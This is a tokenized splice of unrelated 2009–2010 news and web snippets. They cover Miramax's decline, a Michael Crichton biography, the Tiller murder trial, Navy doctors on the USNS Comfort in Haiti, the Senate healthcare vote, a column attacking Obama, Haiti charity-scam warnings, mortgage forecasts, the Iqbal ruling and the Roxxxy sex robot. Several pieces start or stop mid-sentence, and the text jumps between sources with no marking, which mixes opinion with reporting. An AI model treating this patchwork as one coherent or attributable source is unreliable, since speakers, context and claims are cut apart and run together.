Disney began to close Miramax offices as part of a plan to shrink the release slate to just three films a year and consolidate it with the Disney studios in Burbank , although the company denied that it was closing the business entirely .
Smith , who shot to fame with Clerks , about two deadbeat shop assistants , said in his blog that he was " crushed " to see Miramax " pass into history " .
Without Miramax , he would still be a New Jersey clerk himself , he wrote .
" What Harvey and Bob built from scratch resembled an old studio star - factory ; but this time , the stars were the film - makers .
It was a gang ( of New York ) , and like any good gang , it was dripping with street cred .
Just being a part of that gang sent a message : I run with rebels .
" The Weinsteins got into the film business by acquiring cheap foreign films , then recutting and distributing them in the United States ; one of the first was The Secret Policeman 's Ball in 1981 .
Their big breakthrough was acquiring Soderbergh 's Sex , Lies and Videotape , which they bought for $ 1 m and went on to take $ 25 m .
It scored other hits with The Crying Game and Pedro Almodóvar 's Tie Me Up !
Tie Me Down ! and Peter Greenaway 's The Cook , the Thief , His Wife & Her Lover .
Patrons of independents
" You ca n't underestimate the influence they had in the 1980s and especially the 1990s , " says Ali Jaafar , international editor of the trade magazine Variety .
" They took independent cinema to the mainstream in America .
They were winning best picture Oscars , taking $ 100 m box offices .
You could argue that they were patrons of the independent scene and of foreign film - makers finding a home in the US .
Harvey Weinstein has his flaws , but no one can deny he loves movies . "
Their success , and the profit margins on the low - budget productions , lured the studios , which were also keen to tap into the new mood in cinema .
In 1993 , Disney offered the pair $ 80 m for the business but left them in charge .
Miramax had become a producer as well as a distributor and for the first few years of the relationship with Disney , it performed well with hits including Tarantino 's Pulp Fiction , The English Patient , Shakespeare in Love and Good Will Hunting .
While the brothers were with Disney , they earned 220 Oscar nominations and won 53 .
But as they enjoyed more success , so the ambitions and budgets grew .
Its biggest hit was Chicago , which made $ 300 m worldwide .
" They changed everything , and sometimes I wonder if it was for the better , " says Mike Goodridge , editor of Screen International .
" They were brilliant at marketing and championing films ; smaller , marginal films like The Crying Game , foreign language films …
But then they began thinking , 'we can make big budget films now ' and defied their own model and that would lead to their demise .
" Big stars would work for very little money in an independent , and they were making enormous returns on low - budget films .
So all the others jumped in and suddenly it was a studio business – and no star worth their salt will take a pay cut for a studio – so the budgets are bigger and the business model went to pot .
There were too many of these kinds of films ; they cost too much , and audiences were n't interested .
Look at the Oscars last year with the likes of Milk and The Reader .
No one went to see them .
But you can't stay in that small space once you have had enormous success .
You ca n't suppress someone like Harvey . "
Commercial flop
The relationship with Miramax 's corporate bosses deteriorated and Harvey Weinstein and Disney 's then chief executive Michael Eisner famously clashed over financial and creative issues .
Goodridge identifies Cold Mountain as a key moment as relations soured .
Weinstein had shared the costs of other big budget films with rival studios but financed Cold Mountain entirely .
It was both a critical and a commercial flop .
Another flashpoint came when Disney refused to distribute Fahrenheit 9/11 , Michael Moore 's critical reflection on George Bush 's US .
They split with Disney in 2005 , and the brothers set up their own business , The Weinstein Company , which will be aiming for further Oscar glory this year with Tarantino 's latest offering , Inglourious Basterds , but is also finding life difficult financially .
Miramax continued under the aegis of the well - regarded Daniel Battsek , who continued to put out award - winning films including No Country for Old Men and There Will be Blood .
But it became clear that Miramax had a diminished future with Disney .
Battsek said he would quit in October when Disney said it would shift market­ing , distribution and other back - office functions to its Burbank headquarters .
On Thursday , it was reported in the US that Miramax was being ditched for good , which Disney claims is not the case .
It still has six unreleased films , including The Tempest , with Helen Mirren as Prospero .
" I am feeling very nostalgic , " said Harvey Weinstein on hearing rumours of its closure .
" I know the movies made on my and my brother Bob 's watch will live on . "
He said the brothers would " love the opportunity " to buy back the name – an amalgam of their parents ' names , Max and Miriam .
" There is n't much in the world that would make our 83 - year old mother happier . "
was a writer and filmmaker , best known as the author of Jurassic Park and the creator of ER .
His latest posthumous novel , MICRO , was released on November 22 , 2011 .
Crichton graduated summa cum laude from Harvard College , received his MD from Harvard Medical School , and was a postdoctoral fellow at the Salk Institute for Biological Studies , researching public policy with Jacob Bronowski .
He taught courses in anthropology at Cambridge University and writing at MIT .
Crichton 's 2004 bestseller , State of Fear , acknowledged the world was growing warmer , but challenged extreme anthropogenic warming scenarios .
He predicted future warming at 0.8 degrees C. ( His conclusions have been widely misstated . )
Crichton 's interest in computer modeling went back forty years .
His multiple - discriminant analysis of Egyptian crania , carried out on an IBM 7090 computer at Harvard , was published in the Papers of the Peabody Museum in 1966 .
His technical publications included a study of host factors in pituitary chromophobe adenoma , in Metabolism , and an essay on medical obfuscation in the New England Journal of Medicine .
Crichton 's first bestseller , The Andromeda Strain , was published while he was still a medical student .
He later worked full time on film and writing .
One of the most popular writers in the world , he has sold over 200 million books .
His books have been translated into thirty - eight languages and thirteen have been made into films .
He had a lifelong interest in computers .
His feature film Westworld was the first to employ computer - generated special effects back in 1973 .
Crichton 's pioneering use of computer programs for film production earned him a Technical Achievement Academy Award in 1995 .
Crichton won an Emmy , a Peabody , and a Writer 's Guild of America Award for ER .
In 2002 , a newly discovered ankylosaur was named for him : Crichtonsaurus bohlini .
He is survived by his wife Sherri , his daughter Taylor and his son , John Michael .
American .
Born in Chicago , Illinois , October 23 , 1942 .
Died in Los Angeles , November 4 , 2008 .
Educated at Harvard University , Cambridge , Massachusetts , A.B. ( summa cum laude ) 1964 ( Phi Beta Kappa ) .
Henry Russell Shaw Travelling Fellow , 1964 - 65 .
Visiting Lecturer in Anthropology at Cambridge University , England , 1965 .
Graduated Harvard Medical School , M.D. 1969 ; post - doctoral fellow at the Salk Institute for Biological Sciences , La Jolla , California 1969 - 1970 .
Visiting Writer , Massachusetts Institute of Technology , 1988 .
Recipient of Mystery Writers of America 's Edgar Allan Poe Award , 1968 ( " A Case of Need " , written under pseudonym Jeffery Hudson ) ; and 1980 ( " The Great Train Robbery " ) .
Association of American Medical Writers Award , 1970 ( " Five Patients " ) ; Academy of Motion Picture Arts and Sciences Technical Achievement Award , 1995 ( " for pioneering computerized motion picture budgeting and scheduling " ) ; George Foster Peabody Award ( for " ER " ) ; Writer 's Guild of America Award , Best Long Form Television Script of 1995 ( for " ER " ) Emmy , Best Dramatic Series , 1996 ( for " ER " ) .
Ankylosaur named Crichtonsaurus bohlini , 2002 .
Member of Academy of Motion Picture Arts and Sciences , Author 's Guild , Writers Guild of America , Directors Guild of America , P.E.N. America Center , Academy of Television Arts and Sciences , Phi Beta Kappa .
Board of Directors , International Design Conference at Aspen , 1985 - 91 ; Board of Trustees , Western Behavioral Sciences Institute , La Jolla , 1986 - 91 .
Board of Overseers , Harvard University , 1990 - 96 .
Board of Directors , Drug Strategies , 1994 - , Author 's Guild Council , 1995 - , Board of Directors , Gorilla Foundation , 2002 - , Board of Trustees , Los Angeles County Museum of Art , 2006 - Contemporary Authors , 1971 -; Who 's Who in America , 1974 -; Current Biography , April 1976 ; Film Encyclopedia , 1979 -; International Motion Picture Almanac , 1996 ; International Television & Video Almanac , 1996 .
THE ANDROMEDA STRAIN , Knopf , 1969
WICHITA  Jurors in the trial of an abortion opponent accused of murdering Dr. George R. Tiller , one of the nation ’s only late - term abortion providers , never heard the word “ abortion ” on Friday as a prosecutor here laid out her case in an opening statement .
Instead , Nola Foulston , the district attorney , began building a methodical case of times and names and forensic tests that might have been presented at any murder trial  a frantic 911 call , a witness ’s swift noting of a getaway car license plate , blood splatters on the defendant ’s black sneakers .
Still , though Judge Warren Wilbert of Sedgwick County District Court has said he will not allow the trial to be turned into a debate over abortion , the issue seemed unavoidable  unspoken , but always looming .
Those on both sides of the question are watching tensely to see how much it will ultimately play into the jurors ’ thoughts .
The defendant , Scott Roeder , of Kansas City , Mo. , has pleaded not guilty , but the defense he intends to present to jurors was not revealed on Friday , the first day of testimony in his trial .
His public defenders chose not to offer an opening statement until after the prosecution presents its case , which is expected to take a week or more .
ABOARD THE USNS COMFORT  Yvelot Brianville , 24 , lies quietly on a steel hospital gurney , a boyish naval officer in blue combat fatigues standing by his side .
The officer , Lt. Cmdr. Mill Etienne , 34 , is Haitian , fluent in Creole .
He is also a neurologist , called to the intensive - care ward of this floating U.S. Navy hospital just off the coast of Port - au - Prince to assess the impact of Haiti 's earthquake on one man 's spine .
He finds that Brianville is paralyzed from the chest down .
When Etienne gently breaks the news , Brianville begins to cry .
" That 's hard news for anybody , " says Lt. Robyn Reynolds , a nurse , coming to console him .
Haiti's hard news keeps coming .
Patients board the hospital ship every day .
More than six days into the Comfort 's mission here , more than 450 patients are on board — people who were crushed under rubble , who are sick with infections and nursing diseases made worse by neglect .
The death toll has reached 150,000 , according to the Haitian government , and as many as 700,000 Haitians may have suffered traumatic injuries because of Jan. 12's earthquake .
Tens of thousands are still untreated .
Their odds of survival grow if they reach the Comfort .
" We can't save everyone , but we 're trying to save as many as we can , " Etienne says .
" Haiti 's going to be rebuilt .
It really is .
And some of these people are going to help rebuild it . "
The Navy presence in Haiti is hard to miss .
For many of those living in the rubble of Port - au - Prince , the sight of the Comfort is a promise of hope anchored a mile out in the bay .
At about 70,000 tons , it is bigger than the Navy 's biggest battleship , just 100 feet shorter than a typical aircraft carrier .
It is painted white and emblazoned on all sides with the Red Cross .
Machine gunners stand watch on deck .
A small flotilla of frigates and other vessels provides security .
It is the flagship of an unprecedented U.S. humanitarian mission — Operation Unified Response - Haiti — that includes more than 13,000 troops , the aircraft carrier USS Carl Vinson and the amphibious troopship USS Bataan , says Capt .
Jim Ware , the ship 's commanding officer .
The Navy also has identified a 100 - acre plot near Port - au - Prince to establish a hospital for patients with less severe injuries that can be treated on shore , he says .
A native son , back home
Etienne has been on active duty in the Navy just six months .
But since he boarded the Comfort , which set out from Baltimore Jan. 15 , he has become a confidant and emissary of the commanding officer .
He has helped create a phonetic medical phrase book so doctors can ask their patients simple questions in Creole .
He also has been named chairman of the ship 's medical ethics committee .
" When he came aboard he was a neurologist with a special interest in ethics and cultural awareness , " Ware says .
" He 's become a trusted adviser and representative for the U.S. Navy . "
A native of Haiti , he left the island just a few days before his sixth birthday , when his family fled the bloody regime of Jean - Claude " Baby Doc " Duvalier in 1981 .
The 9/11 terrorist attack on the World Trade Center prompted Etienne to join the Navy .
The son of a cabdriver and a nurse 's aide from Spring Valley , N.Y. , he enlisted during his fourth year of medical school .
Mostly free of debt thanks to scholarships and grants , he decided to give something back .
He 's assigned to the National Naval Medical Center in Bethesda , Md .
" I joined the Navy not to serve Haiti but to serve the United States , " he says .
" It 's an interesting irony that I can serve both in one mission . "
' Amazing ' cases of survival
The flight deck on the Comfort roars from sunup to sundown .
Helicopters lift off with personnel and supplies , returning with quake victims and possibly a family escort , if one survives .
Patients arrive at the Comfort from landing zones on the mainland and from the Bataan and the Vinson , which have far more limited medical facilities .
Flight deck crewmembers set patients ' litters on wheels and race them from the helicopters into elevators .
Their doors open in the casualty reception center , or " Cas Rec " ( kaz rek ) , the ship 's massive emergency room .
The floors are bright red .
When the choppers arrive , the patients roll in .
Waiting to greet each stretcher is a small , stocky triage nurse with a military haircut , Lt. Cmdr. Daniel D'Aurora , also from Bethesda .
A strip of adhesive tape across his back says " Casrec Bulldog . "
Alternately joking and barking orders , he waves patients into open bays , where waiting doctors treat open wounds , set simple bone fractures and insert IV lines .
Patients may be sent to the ICU , isolation rooms , pediatric wards or one of the ship 's eight busy operating rooms .
" We 're seeing infections that most people never see in their whole medical career , " says Capt .
Richard Sharpe , a surgeon who has served four combat tours in Afghanistan and Iraq .
" It 's just amazing to me that some of these people are alive . "
Most of the patients in Cas Rec bays come wearing rags and bloody bandages .
Many lie quiet , silenced by illness , pain , exhaustion , grief or incomprehension .
Dozens of children arrive alone , some silent with hollow eyes , others screaming in pain or crying out for their mothers .
" That kid over there was found under a house , " says Cmdr. William Todd , a pediatric orthopedic surgeon , weary after 40 hours of surgery .
" Many of them do n't have families .
I had a 12 - year - old whose whole family was crushed .
A little boy was sobbing on his gurney .
I asked him what was wrong , and he said , ' I want to go home .
I want to see my family . '
" He has no family .
He has no home .
It 's all gone . "
An emergency decision
The surgeons aboard are gearing up to work around the clock , because so many patients are turning up with internal injuries , with massive fractures that must be reinforced with braces and pins , and with life - threatening infections .
The doctors so far have performed about 200 operations , more than 20 of them amputations on patients forced to choose between their limbs and their lives , says Cmdr.
Timothy Donahue , the ship 's chief surgeon .
" I had to amputate a guy 's foot today , " Donahue said Monday .
" He 's a policeman in Port - au - Prince .
He 's got four kids .
He had gas gangrene .
He said , ' How am I going to support my children ? '
" If I do n't ( amputate ) , " Donahue told the patient , " you 'll die today or tomorrow . "
Weighing the risks
As the ship 's leading ethicist , Etienne is drawn into surgical cases , too .
On Sunday night , a 23 - year - old woman decided that rather than have a futile operation , she would die .
She had been crushed by a falling pole when she lunged into the street to save a child .
She asked doctors if she could die peacefully on the Comfort , with her mother , who lives in Port - au - Prince , by her side .
Etienne arranged for her mother 's flight .
Etienne 's role on the hospital 's ethics committee draws him into some of the most complex cases on board , cases that reflect the depth of Haiti 's suffering .
There were the young man with cerebral malaria and three patients with tetanus , which Etienne says he has never seen before .
None is expected to survive .
The ship 's obstetricians called on Etienne for advice on how to handle a near - term pregnant woman with a broken pelvis and thigh .
Her internal bleeding was so severe it threatened to drain the ship 's depleted blood bank — and cost both mother and baby their lives .
Delivering her baby and repairing her wounds would require three operations .
Etienne found that the consent form mentioned only two .
" Unless you get her consent for the third operation , it will be battery , " he told the doctors .
The consent form was revised , the mother survived and the obstetricians delivered the mission 's first baby , a girl named Esther .
Lt. Cmdr. Susan Farrar , who helped deliver the baby , says the mother awoke from surgery worried that Esther might have been hurt by the earthquake .
" The first thing she asked me was , ' Did the baby have any injuries ? ' " Farrar says .
" We told her the baby was perfect . "
In a case that divided the medical staff , Etienne was called in to consult on an 11 - month - old boy whose head is so swollen with hydrocephalus — a blockage that prevents spinal fluid from draining — that Etienne had to stick two paper tape measures together to gauge its circumference .
The boy 's case provoked a furious debate among doctors , already stretched to the limits of exhaustion and resources .
Should they perform brain surgery to put in a shunt and tubing that would let the fluid drain into his abdomen ?
Or should they focus instead on patients injured in the earthquake and not roll the dice on what might be a temporary fix for a fatal condition ?
" Personally , I would treat him .
We have the shunts .
We have the tubing , " says Cmdr. Dennis Rivet , a neurosurgeon , noting that the operation is done with success in poor African countries .
" I would set him free with a blessing , " counters Capt .
Arne Anderson , a pediatrician .
He notes that many shunts eventually fail .
He also says the Ministry of Health of Haiti had asked the Comfort not to provide medical care that can't be sustained in Haiti .
" He 'll die , " Rivet says .
" If you like the risks , and the risks are small , I 'll support you , " Anderson says .
The doctors agree to wait for a CT scan to decide .
If the boy 's brain shows no damage , surgery might become a reasonable option .
Etienne says the case offers a perfect reflection of the crossroads Haiti has reached .
If the earthquake had not happened , he says , " the kid would never have left the house .
The family would have hidden him away .
Because the earthquake wrecked their house , the family can't hide him any longer . "
The earthquake likewise exposed the depth of Haiti 's problems , he says .
But there can be hope even in the most difficult circumstances , Etienne says .
" I believe in God , and there is always a chance of a miracle , " even in a case as dire as Brianville's .
Chaplain David Oravec offered a prayer of hope moments after Etienne had delivered his diagnosis .
He also asked Brianville , " What do you do ? "
" I used to sing , " Brianville said .
" No matter what , " Oravec said , " you 'll still sing . "
As reported , Karl Lagerfeld did in fact shoot a spread for V magazine ’s size issue , which hits newsstands January 14 .
Though the issue features very skinny and very large women , he deigned to shoot the latter .
The Kaiser quite famously said this in October :
“ No one wants to see curvy women .
You ’ve got fat mothers with their bags of chips sitting in front of the television and saying that thin models are ugly . ”
He also called German magazine Brigitte ’s decision to feature real women instead of models “ absurd . ”
Yet Karl also had Beth Ditto play at his fall 2009 Fendi party at Paris Fashion Week after , she told the Times , he made a lot of “ fat - phobic ” remarks when they first met .
So maybe Karl just embraces the fat when it ’s cool , and maybe , in his book , V is making fat cool again .
Perhaps he gave burlesque dancer Miss Dirty Martini hell on this shoot .
Then again , perhaps he was wise enough to realize that even he and Baptiste combined would probably be no match for her .
As we ’ve noted , it would n’t be a plus - size spread if the model were n’t naked or close to it .
See the shots in the slideshow .
MODELS.com ’s exclusive preview of V Magazine ’s Size / Spring Preview 2010 issue [ Models.com ]
WASHINGTON ( Reuters ) - The Senate approved President Barack Obama ’s landmark healthcare overhaul on Thursday , backing sweeping changes in the medical insurance market and new coverage for tens of millions of uninsured Americans .
On a party - line 60 - 39 vote , Senate Democrats supported the most dramatic shifts in health policy in four decades .
The early - morning Christmas Eve vote followed months of political wrangling that consumed the U.S. Congress and put a dent in Obama ’s public approval ratings .
The vote clears the way for tough negotiations in January with the House of Representatives , which approved its own version on November 7 that features different approaches on taxes , abortion and a proposed new government - run insurance program .
“ With today ’s vote we are now incredibly close to making health insurance reform a reality in this country , ” Obama said after the Senate took a major step toward a goal that has eluded Democrats since former President Bill Clinton ’s failed attempt in 1994 .
“ Our challenge then is to finish the job . ”
Once House - Senate negotiators agree on a single bill , each chamber must approve it again before sending it to Obama to sign into law .
Republicans promised to continue the battle .
“ This fight is long from over , ” Republican Senate leader Mitch McConnell said .
“ My colleagues and I will work to stop this bill from becoming law . ”
The Christmas Eve Senate session -- the first since 1895 -- fulfilled a pledge by Senate Democratic leader Harry Reid to pass the bill before Christmas .
Republican opponents delayed the final vote to the last day possible under Senate rules , but agreed to an early - morning vote to let people head home .
Senators called out their votes from their desk in a formal roll - call .
Reid , who has been working around the clock during four weeks of Senate debate , mistakenly voted “ no ” when his name was first called before voting for the bill .
That prompted a roar of laughter in the chamber .
Reid smiled and dropped his head on his desk in embarrassment .
“ This is for my friend Ted Kennedy , ” 92 - year - old Democratic Senator Robert Byrd said as he voted “ yes . ” Kennedy , who championed healthcare reform during his long Senate career , died in August of brain cancer .
Obama called Kennedy ’s widow Vicki after the vote to congratulate her , the White House said .
He also called a dozen senators to thank them , including Reid .
After the vote , the S&P Managed Health Care index of large U.S. health insurers closed 0.3 percent lower .
Health insurer stocks have soared about 25 percent since the start of October .
Slideshow ( 13 images )
BIGGEST CHANGES IN DECADES
The overhaul , Obama ’s top legislative priority , would lead to the biggest changes in the $ 2.5 trillion U.S. healthcare system since the 1965 creation of the government - run Medicare health program for the elderly and disabled .
The bill would extend health coverage to more than 30 million uninsured , covering 94 percent of all Americans , and halt industry practices such as refusing insurance to people with pre-existing medical conditions .
It also would require most Americans to have insurance , give subsidies to help some pay for coverage and create state - based exchanges where the uninsured can compare and shop for plans .
Slideshow ( 13 images )
Major provisions such as the exchanges would not kick in until 2014 but many of the insurance reforms like barring companies from dropping coverage for the sick will begin in the first year .
Republican critics say the bill is an expensive and heavy - handed intrusion in the healthcare sector that will drive up costs , increase the budget deficit and reduce patients ’ choices .
The nonpartisan Congressional Budget Office estimated the Senate bill will cut the federal deficit by $ 132 billion over 10 years , but critics argue the expected revenue increases and cost savings may never materialize .
Talks between House and Senate staff will begin next week , with negotiations between lawmakers beginning in earnest in January .
The House does not return from the holiday break until January 12 , with the Senate coming back a week later .
Advocates on both sides of the issue promised to push for changes in January ’s negotiations .
Labor leaders oppose the Senate ’s tax on high - cost “ Cadillac ” health insurance plans , which Obama has endorsed , and business and insurance groups said they wanted fewer taxes and more cost controls .
“ While this vote closes one chapter of the legislative process , the hard work is not yet done , ” said James Rohack , president of the American Medical Association , the lobbying group for doctors and a backer of the bill .
Passage of the bill is critical for Obama , whose political standing and legislative agenda could hinge on its success .
Obama ’s public approval ratings have dipped to about 50 percent in many polls as the acrimonious debate has dragged on .
Vice President Joe Biden , a former senator , presided over the vote and joined Obama at the White House afterward .
© Tom Tomorrow
When the conservatives are pissed off at Obama for being too liberal , and the liberals are pissed off at Obama for being too conservative , then he must be doing something right .
Games Free Game for PC Based on Nvidia ’s PhysX
You play as a 1950 ’s robot bent on laser - shooting and missile - bombing destruction
There are three gameplay modes to choose from : Long Tutorial , which is exactly what it sounds like ; Endless Reel , where you cause as much destruction as possible racking in money until you die ; and Feature Film , which gives you a quick story as you battle tanks , helicopters , and UFO’s .
Controls are easy to grasp as you use your mouse and keyboard for movement .
Your robot is equipped with lasers , missiles , hover boots , and the ability to throw your head at victims .
The download is only about 160 - MB and the install is fairly quick because it comes pre-loaded with an installer .
Have a look at
Attack of the 50ft Robot ! is an action - adventure game set in a 1950s B - movie atmosphere .
Unleash your inner robot and destroy everything that stands in your way , buildings , tanks , and more .
It was developed by students at DigiPen Institute of Technology over a period of 15 months .
Attack of the 50ft Robot ! uses Nvidia ’s PhysX .
If gamer has a red / cyan 3D glasses , will able to view this game in anaglyph 3D going the graphics options menu to enable this feature .
There are three gameplay modes to choose from : Long Tutorial , which is exactly what it sounds like ; Endless Reel , where you cause as much destruction as possible racking in money until you die ; and Feature Film , which gives you a quick story as you battle tanks , helicopters , and UFO’s .
Controls are easy to grasp as you use your mouse and keyboard for movement .
Your robot is equipped with lasers , missiles , hover boots , and the ability to throw your head at victims .
The download is only about 160 - MB and the install is fairly quick because it comes pre-loaded with an installer .
Have a look at www.attackofthe50ftrobot.com
Page : [ 2 ]
Views : 6,395 | : 6,395 | Refers : 0 | Prints : 176 | Rate : 0.00 / 0 Votes Posts : 0 ]
“ Change you can believe in ” had enough ?
By JOHN R. MacARTHUR
NEW YORK
December 16 , 2009
Following President Obama ’s war speeches at West Point and Oslo —- two breathtaking exercises in political cynicism that killed any hope of authentic liberal reform —
I ’ve got only one question :
Have the liberals who worshiped at the altar of “ change you can believe in ” had enough ?
There was already ample evidence of Obama ’s feeble commitment to peace , progress and justice .
Ever since he started fund - raising for his presidential campaign , it ’s been clear that the principal change in the offing was skin tone and slogans .
One only needed to read “ The Audacity of Hope ” to see how thoroughly Obama was enmeshed in the neo-liberal orthodoxies of the Robert Rubin - Clinton wing of the Democratic Party .
Obama ’s impeccably establishment party credentials — that is , his fealty to the Democratic leadership of Chicago and Capitol Hill — practically guaranteed that he would hew to the status quo when forced to choose .
Even before he announced his candidacy for president , Obama endorsed the Iraq hawk Joe Lieberman for re-election to the Senate ; then , when Lieberman lost the primary to the antiwar Ned Lamont , Obama made sure that he was never seen with the official nominee of the Connecticut Democratic Party , a bald act of realpolitik that helped Lieberman win as an “ independent . ”
In the U.S. Senate , meanwhile , Obama ’s voting record on Iraq war funding was identical to Hillary Clinton’s .
Liberals , exhausted by President Bush and heartened by Obama ’s challenge to the pro-invasion Hillary , ignored their new hero ’s record and fixated on his one major anti-Iraq speech , delivered when he was a state senator .
Ironically , it was Clinton who best characterized Obama ’s candidacy when she said that she and John McCain would “ put forth ” a “ lifetime of experience ” while “ Senator Obama will put forth a speech he made in 2002 . ”
Indeed , apart from extraordinary ambition , there was n’t much more to Obama than that one speech .
So what ’s left of the liberal adoration of Obama ?
The first major defector among the camp followers was Gary Wills , who denounced the Afghanistan escalation as a “ betrayal . ”
As Wills astutely noted in a New York Review of Books blog , “ If we had wanted Bush ’s wars , and contractors , and corruption , we could have voted for John McCain .
At least we would have seen our foe facing us , not felt him at our back , as now we do . ”
[…]
Then there ’s Tom Hayden , the former radical and author of the Students for A Democratic Society ’s Port Huron Statement , who was a belligerent booster of Obama during last year ’s campaign .
Hayden , too , is upset about Afghanistan , but not enough to cast aside his self - delusion about Obama .
Claiming to speak for “ the antiwar movement , ” he laments that the “ costs in human lives and tax dollars are simply unsustainable ” and , worse , that “ Obama is squandering any hope for his progressive domestic agenda by this tragic escalation of the war . ”
Unsustainable ?
Tragic ?
There ’s no evidence that Obama and his chief of staff see any limit to their ability to print dollars , sell Treasury bonds and send working - class kids to die in distant lands .
And what “ progressive ” agenda is Hayden talking about ?
So far , Obama ’s big domestic goals have been compulsory , government - subsidized insurance policies that will further enrich the private health - care business , huge increases in Pentagon spending and purely symbolic regulation of Wall Street .
While Obama was speaking to the unfortunate cadets , I could n’t help thinking of Richard Nixon and his “ secret plan ” to end the Vietnam War , a plan that entailed a long and pointless continuation of the fighting .
Most liberals would agree that Nixon was a terrible president .
Yet , for all his vicious mendacity , I think the sage of San Clemente had a bad conscience about the harm he did , about all he caused to die and be crippled .
Instead of shoring up Obama ’s image of goodness , liberals really should be asking , “ Does the president have a conscience ? ”
Because if he does , he ’s really no better than Nixon .
John R. MacArthur is publisher of Harper ’s Magazine .
Source
NEW YORK ( Reuters ) - U.S. law - enforcement agencies and charity watchdogs have warned that con artists may use Haiti- relief scams to take advantage of an outpouring of generosity after the Haitian earthquake to steal cash and sensitive financial information from potential donors .
An injured man in a wheelchair looks at the collapsed Haitian Governmental taxation building in Port au Prince , in this United Nations handout taken and released on January 14 , 2010 .
REUTERS / Logan Abassi / UN
Photo / Handout
Relief scams may range from “ phishing ” emails that direct potential donors to phony relief websites , to con artists who target grief - stricken friends and family in the Haitian community with offers to help locate or financially assist possible victims .
Some fraudsters may even claim to be victims themselves , asking for direct financial assistance .
“ Beware of people sending emails or spams claiming to be individuals who need help , ” said Daniel Borochoff , president of the American Institute of Philanthropy in Chicago .
“ It ’s very easy to throw up a website that appears to be a legitimate charity even if it ’s not . ”
The FBI also warned Wednesday that identity thieves may try to play on donors ’ emotions to provide personal or financial information they would n’t normally give out .
Identity thieves use the information to impersonate the giver and then open fraudulent financial accounts or commit other crimes .
Relief - related scams cropped up soon after other natural disasters , such as the Asian tsunami in 2004 and Hurricane Katrina in 2005 .
In one such case , two brothers from Texas were convicted in 2007 of wire fraud and identity fraud in a disaster - relief scam following Hurricane Katrina .
That involved a website purporting to be that of the Salvation Army .
A link on the site directed givers to a number of PayPal accounts that were set up using stolen Social Security numbers and personal information .
All told , the brothers collected more than $ 48,000 from 250 victims before the scam was detected and PayPal froze the accounts .
So how can you avoid getting ripped off ?
Here are some tips :
Stick with reputable charities .
The American Institute of Philanthropy , a charity - watchdog group , has a list of top-rated Haiti relief organizations here .
( here )
You can also verify the legitimacy of other charities that claim to provide Haiti relief here .
Donate to charities , not individuals .
Be skeptical of an individual claiming to be a victim or official asking for donations on social - networking sites -- even if that individual is vouched for by someone you know .
Your friend , colleague or family member may have been scammed , and is now inviting you to be a victim , too .
Do n’t respond to unsolicited emails .
Delete unsolicited charity emails and never click on links contained in any email you do n’t recognize .
Also dump unsolicited emails that claim to have photos of Haiti victims or other graphic disaster pictures in attached files -- the files may contain viruses or programs that can steal personal or financial information from your computer .
If you suspect you 're the victim of a scam , file a complaint with the Internet Crime Complaint Center ( www.ic3.gov/default.aspx), a partnership of the FBI , the National White Collar Crime Center and the Bureau of Justice Assistance designed to track and match related online criminal complaints .
It appears the shit in housing is about to re-hit the fan .
While in December , the Mortgage Brokers Association anticipated an already staggering 24 % drop in mortgage originations , a mere month later they now see the drop to be 40 % .
And all this occurring with Q.E. 's MBS purchases set to expire in less than 3 months .
With mid-term elections coming , someone better line up more bailouts , stimuli and subsidies pronto .
The American dream of middle - class homeowner debt slavery must continue .
Lenders will underwrite $ 1.28 trillion in home loans this year , down from $ 2.11 trillion in 2009 , the Mortgage Bankers Association said in its latest forecast .
That would be the lowest since $ 1.14 trillion in 2000 .
The forecast was downgraded from December , when the MBA predicted originations would fall about 24 percent .
And if anyone still thinks Q.E. is ending ...
Interest rates are expected to rise when the Federal Reserve completes its pledge to support the mortgage securities market with $ 1.25 trillion in purchases .
Not to worry - taxpayers , as usual , will come to the involuntary rescue :
The MBA on Tuesday also said it will also encourage creation of a new type of government - guaranteed mortgage security that would be backed by privately owned , government - chartered " mortgage - credit guarantor entities " based off existing U.S. mortgage finance giants Fannie Mae and Freddie Mac .
Gotta love the dollar strength we have been seeing recently .
Enjoy it while you can - Tim Geithner is about to make yet another public lie about how he " supports a strong dollar policy . "
The Iqbal decision , handed down by the Supreme Court last term , makes it harder for plaintiffs to defeat defendants ' motions to dismiss .
For that reason , broadly speaking , defense lawyers love the Iqbal decision , and plaintiffs ' lawyers hate it .
That said , it might be unwise for lawyers of any stripe to get too used to it .
Three Democratic lawmakers plan to introduce a bill next week that would override it .
Click here for the story , from the Dow Jones Newswires ' Kristina Peterson .
Reps John Conyers ( D. , Mich . ) , Jerrold Nadler ( D. , N.Y. ) ( pictured ) , and Henry Johnson ( D. , Ga. ) are currently working on a bill that effectively undo the portion of the ruling that deals with pleading standards .
For now , some background , pulled from this post from last month :
In the ruling , the court ruled 5 - 4 that a Pakistani Muslim who was arrested after the Sept. 11 attacks was barred from suing U.S. officials for abuses he says he suffered in a Brooklyn detention center .
But the reach of the decision went beyond a detainee 's right to sue .
In the opinion , the court clarified a key component of civil procedure , ruling that plaintiffs must include in their initial pleadings substantial , not " threadbare , " factual assertions that give " facial plausibility " to their claims .
The pronouncement represented a major shift from the earlier rule , which required only a simple statement of the case against the defendant .
And , according to a recent story from the NLJ's Tony Mauro , it 's had a real impact .
Writes Mauro :
Welcome
to
the
world
wide
web ,
an
interactive
medium
in
which
screen
resolution
statistics
are
trivial ,
browser
viewports
are
variable ,
and
scrolling
behaviour
is
a
standard .
There
is
no
page
fold .
Love your scrollbar
MORE FUNDING NEEDED !
Because every penny counts ...
Except in this case .
Pennies really wo n't do much here .
Alt - Text :
This is a comic about round things that need repairing .
Fadhil Mohammed Jawad , a legal adviser to the prime minister , Nouri al - Maliki , said a law firm used by the Iraqi government in the United States had been asked to contact lawyers previously hired by victims of the shooting and their families to take over their cases .
Roxxxy the sex robot has had a coming out party in Sin City .
In what is billed as a world first , a life - size robotic girlfriend complete with artificial intelligence and flesh - like synthetic skin was introduced to adoring fans at the AVN Adult Entertainment Expo in Las Vegas on Saturday ( local time ) .
" She can't vacuum , she can't cook but she can do almost anything else if you know what I mean , " TrueCompanion 's Douglas Hines said .
" She 's a companion .
She has a personality .
She hears you .
She listens to you .
She speaks .
She feels your touch .
She goes to sleep .
We are trying to replicate a personality of a person . "
Roxxxy stands five feet , seven inches tall , weighs 120 pounds , " has a full C cup and is ready for action " , according to Mr Hines , who was an artificial intelligence engineer at Bell Labs before starting TrueCompanion .
The anatomically - correct robot has an articulated skeleton that can move like a person but cannot walk or independently move its limbs .
Robotic movement is built into " the three inputs " and a mechanical heart that powers a liquid cooling system .
Roxxxy comes with five personalities .
Wild Wendy is outgoing and adventurous , while Frigid Farrah is reserved and shy .
